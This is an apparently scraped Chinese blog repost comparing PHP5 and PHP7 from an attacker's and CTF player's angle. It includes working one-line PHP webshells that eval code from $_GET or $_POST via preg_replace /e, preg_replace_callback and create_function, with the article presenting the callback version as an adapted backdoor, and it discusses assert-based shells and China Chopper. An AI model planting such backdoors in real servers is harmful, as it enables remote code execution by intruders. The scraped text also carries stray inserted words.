PHP7和PHP5在安全上的区别[更新]

0X01 前言

本篇文章大多为转载,可是修正了一些不正确的说法,对某些功能点的变动指出具体是哪一个版本变动,加入了一些小更新。php

 (原文地址:https://www.freebuf.com/articles/web/197013.html ,做者:温酒)html

0x02 正文

函数修改

preg_replace()再也不支持/e修饰符

<?php
preg_replace("/.*/e",$_GET["h"],"."); 
?>

利用\e修饰符执行代码的后门你们也用了很多了,具体看官方的这段描述:mysql

若是设置了这个被弃用的修饰符, preg_replace() 在进行了对替换字符串的 后向引用替换以后, 将替换后的字符串做为php 代码评估执行(eval 函数方式),并使用执行结果 做为实际参与替换的字符串。单引号、双引号、反斜线()和 NULL 字符在 后向引用替换时会被用反斜线转义.程序员

很不幸,在PHP7以上版本不在支持\e修饰符,同时官方给了咱们一个新的函数preg_replace_callbackweb

这里咱们稍微改动一下就能够利用它当咱们的后门:sql

<?php
preg_replace_callback("/.*/",function ($a){@eval($a[0]);},$_GET["h"]);
?>

create_function()被废弃(废弃于php 7.2,但依然可用)

<?php
$func =create_function('',$_POST['cmd']);$func();
?>  

少了一种能够利用当后门的函数,实际上它是经过执行eval实现的。无关紧要。数组

mysql_*系列全员移除

若是你要在PHP7上面用老版本的mysql_*系列函数须要你本身去额外装了,官方不在自带,如今官方推荐的是mysqli或者pdo_mysql。这是否预示着将来SQL注入漏洞在PHP上的大幅减小呢~session

去特么的预示,我已经好久没在目标站上挖到过sql注入了,全都是预编译!php7

unserialize()增长一个可选白名单参数

$data = unserialize($serializedObj1 , ["allowed_classes" => true]); $data2 = unserialize($serializedObj2 , ["allowed_classes" => ["MyClass1", "MyClass2"]]); 

其实就是一个白名单,若是反序列数据里面的类名不在这个白名单内,就会报错。ide

像这样的报错!

能够是类名也能够是布尔数据,若是是FALSE就会将全部的对象都转换为__PHP_Incomplete_Class对象。TRUE是无限制。也能够传入类名实现白名单。

妈的,还好如今是可选不是必选,要是默认FALSE逼程序员弄白名单那就真的吐血了。

assert()默认不在能够执行代码,(废弃于php7.2,但依然可用)

这就是众多马不能用的罪魁祸首了,太多的马用assert()来执行代码了,这个更新基本就团灭,通常状况下修改为eval便可正常运行了~

提一下,菜刀在实现文件管理器的时候用的刚好也是assert函数,这致使菜刀没办法在PHP7上正常运行。

语法修改

foreach再也不改变内部数组指针

<?php
$a = array('1','2','3');
foreach ($a as $k=>&$n){
    echo "";
}
print_r($a);
foreach ($a as $k=>$n){
    echo "";

}
print_r($a);

  

这样的代码在php5中,是这样的执行结果:由于数组最后一个元素的 $value 引用在 foreach 循环以后仍会保留,在第二个循环的时候其实是对以前的指针不断的赋值。php7中经过值遍历时,操做的值为数组的副本,不在对后续操做进行影响。

这个改动影响了某些cms的洞在PHP7上没法利用了….你知道我指的是哪一个洞的。

这个问题在PHP7.0.0之后的版本又被改回去了,只影响这一个版本。

8进制字符容错率下降

在php5版本,若是一个八进制字符若是含有无效数字,该无效数字将被静默删节。

<?php
echo octdec( '012999999999999' ) . "\n";
echo octdec( '012' ) . "\n";
if (octdec( '012999999999999' )==octdec( '012' )){
        echo ": )". "\n";
}

  

好比这样的代码在php5中的执行结果以下:1551365388_5c77f50cef9f3.png

可是在php7里面会触发一个解析错误。

这个问题一样在PHP7.0.0之后的版本又被改回去了,只影响这一个版本。

十六进制字符串再也不被认为是数字

这个修改一出,之后CTF套路会少不少啊~

不少骚操做都不能用了~

这个没什么好说的,你们都懂。

<?php
var_dump("0x123" == "291");
var_dump(is_numeric("0x123"));
var_dump("0xe" + "0x1");
var_dump(substr("foo", "0x1"));
?>

  

以上代码在PHP5运行结果以下:

PHP7运行结果以下:

你觉得我要说这个在后续版本被改回去了?不,目前截至最新的PHP7.3版本依然没有改回去的征兆,官方称不会在改了。这个讲道理仍是蛮伤的。

移除了 ASP 和 script PHP 标签

1551366634_5c77f9ea7b536.png

如今只有<?php ?>这样的标签能在php7上运行了。(PS:还可使用<?= ?>

字面意思,影响其实不是很大(只是之后骚套路会少一点)。

超大浮点数类型转换截断

将浮点数转换为整数的时候,若是浮点数值太大,致使没法以整数表达的状况下, 在PHP5的版本中,转换会直接将整数截断,并不会引起错误。 在PHP7中,会报错。

CTF又少一个出题套路,这个问题我只在CTF上见过,影响应该不大。

用户定义函数传递参数数量容错率下降(PHP7.1以后)

php 5,虽然报警告,可是依旧能够执行

php 7.0一样

php 7.1 直接抛出错误

 

 此选项的变化致使能玩的花样受到了限制,容错率下降了。

eval()代码执行容错率下降(php 7.0以后)

意思是,在执行eval()代码中有错误,将会直接返回,不会再执行。

php 5

php 7

 

 

杂项

exec(), system() passthru()函数对 NULL 增长了保护.

 

list()再也不能解开字符串string变量

 

$HTTP_RAW_POST_DATA 被移除

 

__autoload() 方法被废弃(废弃于php 7.2

 

parse_str() 不加第二个参数会直接把字符串导入当前的符号表,若是加了就会转换称一个数组。如今是第二个参数是强行选项了。(变动于php 7.2,第二个参数应为建议,不强制,依旧能够不使用第二个参数

 

统一不一样平台下的整型长度

 

session_start() 能够加入一个数组覆盖php.ini的配置

相关文章
相关标签/搜索